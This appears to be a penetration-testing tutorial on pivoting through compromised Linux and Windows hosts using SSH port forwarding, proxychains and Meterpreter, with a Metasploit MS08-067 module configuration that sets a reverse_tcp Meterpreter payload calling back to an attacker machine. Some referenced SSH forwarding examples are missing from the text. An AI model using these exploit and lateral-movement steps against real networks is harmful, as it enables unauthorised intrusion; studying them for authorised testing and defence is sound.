Pivoting on a Penetration Test

What is Pivoting ?

Pivoting allows a security consultant to use a host compromised during apen testingengagement to route traffic to other hosts or subnets, giving the tester access to other machines that may have previously inaccessible. Typically, a foot hold is established on a target network from successfully exploiting an external machine on a penetration test or from a successful phishing / spear phishing campaign.

This article focuses specifically on pivoting from compromised Linux hosts using SSH and meterpreter pivoting, however the Meterpreter pivoting techniques also apply to Windows targets.

SSH Pivoting on Pen Tests

SSH port forwarding is a reliable method of pivoting for Linux hosts, the draw back being that a new port forwarding rule needs to be created for each port you wish to access the host on. For example, if you discover a host has SMB and RDP exposed you would need to create a SSH port forwarding rule (see example below) for both ports445and3389. Due to this limitation it's often preferred to conduct scanning either from a compromised machine (using a single binary you can remove once testing has completed) or use Dynamic Proxychain forwarding (see example below) for the initial nmap scan to see what's exposed. Although it's additional effort to setup SSH port forwarding, the extra work is worth it as it allows you to have a stable connection while testing.

Note on Proxychain port forwards

Dynamic SSH Proxychain forwarding does not work with meterpreter shells.

If you attempt to spawn a shell via Meterpreter, you'll get an error similar to the following:

meterpreter > execute -f cmd.exe -i -H
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:41713-<--timeout

How to use Proxychain port forwards

All commands must be prefixed withproxychainsin order to route traffic correctly.

Example connecting to RDP over Proxychains

proxychains rdesktop TARGET-ADDRESS

Metasploit SSH Pivoting Example

The following example assumes you have setup the SSH port forward using the instructions above and port:9999is forwarded to 445. The Metasploit module forMS08_067is used here to demonstrate how one can set up SSH pivoting within Metasploit itself.

Attacking Machine:192.168.3.99

msf exploit(ms08_067_netapi) 
>
 show options

 Module options (exploit/windows/smb/ms08_067_netapi):

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    0.0.0.0          yes       The target address
    RPORT    9999             yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


 Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
    LHOST     192.168.3.99     yes       The listen address
    LPORT     443              yes       The listen port

 Exploit target:

    Id  Name
    --  ----
   0   Automatic Targeting

Meterpreter Pivoting Cheat Sheet

If you have successfully compromised a host during a penetration test it's possible to use a Meterpreter shell to pivot to other hosts on the network. Using Meterpreter it's possible to pivot from compromised Windows and Linux targets, however it's typically far less reliable than SSH port forwarding as Meterpreter sessions are more prone to timing out, which will result in the connection being killed.

How to Connect to targets using Meterpreter Port Forwards

The port is forwarded locally to the target. Using RDP as an example, assuming you have setup a meterpreter port forward using the same port for local and remote. You would connect to it using:

rdesktop 127.0.0.1

EOF